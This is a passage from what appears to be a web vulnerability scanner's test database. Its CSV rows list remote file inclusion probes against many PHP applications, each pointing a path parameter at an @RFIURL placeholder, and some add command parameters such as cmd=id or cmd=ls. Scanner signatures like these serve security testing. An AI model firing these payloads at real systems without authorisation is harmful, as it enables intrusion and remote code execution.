(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004195\",\"5292\",\"c\",\"/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004196\",\"5292\",\"c\",\"/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004197\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004198\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004199\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004200\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004201\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004202\",\"5292\",\"c\",\"/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004203\",\"5292\",\"c\",\"/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004204\",\"5292\",\"c\",\"/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004205\",\"5292\",\"c\",\"/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004206\",\"5292\",\"c\",\"/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004207\",\"5292\",\"c\",\"/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004208\",\"5292\",\"c\",\"/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004209\",\"5292\",\"c\",\"/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004210\",\"5292\",\"c\",\"/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004211\",\"5292\",\"c\",\"/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004212\",\"5292\",\"c\",\"/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004213\",\"5292\",\"c\",\"/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004214\",\"5292\",\"c\",\"/administrator/components/com_webring/admin.webring.docs.php?component_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004215\",\"5292\",\"c\",\"/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004216\",\"5292\",\"c\",\"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004217\",\"5292\",\"c\",\"/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004218\",\"5292\",\"c\",\"/administrator/menu_add.php?site_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004219\",\"5292\",\"c\",\"/administrator/menu_operation.php?site_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004220\",\"5292\",\"c\",\"/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004221\",\"5292\",\"c\",\"/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004222\",\"5292\",\"c\",\"/adodb/adodb-errorpear.inc.php?ourlinux_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004223\",\"5292\",\"c\",\"/adodb/adodb-pear.inc.php?ourlinux_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004224\",\"5292\",\"c\",\"/adodb/adodb.inc.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004225\",\"5292\",\"c\",\"/advanced_comment_system/admin.php?ACS_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004226\",\"5292\",\"c\",\"/advanced_comment_system/index.php?ACS_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004227\",\"5292\",\"c\",\"/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004228\",\"5292\",\"c\",\"/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004229\",\"5292\",\"c\",\"/agenda.php3?rootagenda=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004230\",\"5292\",\"c\",\"/agenda2.php3?rootagenda=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004231\",\"5292\",\"c\",\"/aides/index.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004232\",\"5292\",\"c\",\"/ains_main.php?ains_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004233\",\"5292\",\"c\",\"/ajax/loadsplash.php?full_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004234\",\"5292\",\"c\",\"/ajouter.php?include=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004235\",\"5292\",\"c\",\"/akarru.gui/main_content.php?bm_content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004236\",\"5292\",\"c\",\"/akocomments.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004237\",\"5292\",\"c\",\"/amazon/cart.php?cmd=add&asin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004238\",\"5292\",\"c\",\"/amazon/index.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004239\",\"5292\",\"c\",\"/amazon/info.php?asin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004240\",\"5292\",\"c\",\"/annonce.php?page=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004241\",\"5292\",\"c\",\"/announcements.php?phpraid_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004242\",\"5292\",\"c\",\"/anzagien.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004243\",\"5292\",\"c\",\"/apbn/templates/head.php?APB_SETTINGS[template_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004244\",\"5292\",\"c\",\"/api.php?t_path_core=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004245\",\"5292\",\"c\",\"/apps/apps.php?app=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004246\",\"5292\",\"c\",\"/appserv/main.php?appserv_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004247\",\"5292\",\"c\",\"/arab3upload/customize.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004248\",\"5292\",\"c\",\"/arab3upload/initialize.php?path=@RFIURL?&cmd=pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004249\",\"5292\",\"c\",\"/arash_lib/class/arash_gadmin.class.php?arashlib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004250\",\"5292\",\"c\",\"/arash_lib/class/arash_sadmin.class.php?arashlib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004251\",\"5292\",\"c\",\"/arash_lib/include/edit.inc.php?arashlib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004252\",\"5292\",\"c\",\"/arash_lib/include/list_features.inc.php?arashlib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004253\",\"5292\",\"c\",\"/archive.php?scriptpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004254\",\"5292\",\"c\",\"/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004255\",\"5292\",\"c\",\"/artlist.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004256\",\"5292\",\"c\",\"/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004257\",\"5292\",\"c\",\"/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004258\",\"5292\",\"c\",\"/athena.php?athena_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004259\",\"5292\",\"c\",\"/auction/auction_common.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004260\",\"5292\",\"c\",\"/auction/includes/converter.inc.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004261\",\"5292\",\"c\",\"/auction/includes/messages.inc.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004262\",\"5292\",\"c\",\"/auction/includes/settings.inc.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004263\",\"5292\",\"c\",\"/auction/phpAdsNew/view.inc.php?phpAds_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004264\",\"5292\",\"c\",\"/auth.cookie.inc.php?da_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004265\",\"5292\",\"c\",\"/auth.header.inc.php?da_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004266\",\"5292\",\"c\",\"/auth.sessions.inc.php?da_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004267\",\"5292\",\"c\",\"/auth/auth.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004268\",\"5292\",\"c\",\"/auth/auth_phpbb/phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004269\",\"5292\",\"c\",\"/authenticate.php?default_path_for_themes=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004270\",\"5292\",\"c\",\"/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004271\",\"5292\",\"c\",\"/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004272\",\"5292\",\"c\",\"/auto_check_renewals.php?installed_config_file=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004273\",\"5292\",\"c\",\"/autoindex.php?cfg_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004274\",\"5292\",\"c\",\"/awzmb/adminhelp.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004275\",\"5292\",\"c\",\"/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004276\",\"5292\",\"c\",\"/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004277\",\"5292\",\"c\",\"/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004278\",\"5292\",\"c\",\"/awzmb/modules/help.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004279\",\"5292\",\"c\",\"/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004280\",\"5292\",\"c\",\"/axoverzicht.cgi?maand=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004281\",\"5292\",\"c\",\"/b2-tools/gm-2-b2.php?b2inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004282\",\"5292\",\"c\",\"/b2verifauth.php?index=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004283\",\"5292\",\"c\",\"/backend/addons/links/index.php?PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004284\",\"5292\",\"c\",\"/basebuilder/src/main.inc.php?mj_config[src_path]=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004285\",\"5292\",\"c\",\"/bb_admin.php?includeFooter=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004286\",\"5292\",\"c\",\"/beacon/language/1/splash.lang.php?languagePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004287\",\"5292\",\"c\",\"/beacon/language/1/splash.lang.php?languagePath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004288\",\"5292\",\"c\",\"/belegungsplan/jahresuebersicht.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004289\",\"5292\",\"c\",\"/belegungsplan/monatsuebersicht.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004290\",\"5292\",\"c\",\"/belegungsplan/tagesuebersicht.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004291\",\"5292\",\"c\",\"/belegungsplan/wochenuebersicht.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004292\",\"5292\",\"c\",\"/bemarket/postscript/postscript.php?p_mode=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004293\",\"5292\",\"c\",\"/biblioteca/bib_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004294\",\"5292\",\"c\",\"/biblioteca/bib_pldetails.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004295\",\"5292\",\"c\",\"/biblioteca/bib_plform.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004296\",\"5292\",\"c\",\"/biblioteca/bib_plsearchc.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004297\",\"5292\",\"c\",\"/biblioteca/bib_plsearchs.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004298\",\"5292\",\"c\",\"/biblioteca/bib_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004299\",\"5292\",\"c\",\"/biblioteca/bib_searchc.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004300\",\"5292\",\"c\",\"/biblioteca/bib_searchs.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004301\",\"5292\",\"c\",\"/biblioteca/edi_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004302\",\"5292\",\"c\",\"/biblioteca/edi_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004303\",\"5292\",\"c\",\"/biblioteca/gen_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004304\",\"5292\",\"c\",\"/biblioteca/gen_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004305\",\"5292\",\"c\",\"/biblioteca/lin_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004306\",\"5292\",\"c\",\"/biblioteca/lin_save.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004307\",\"5292\",\"c\",\"/biblioteca/luo_form.php?CLASSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 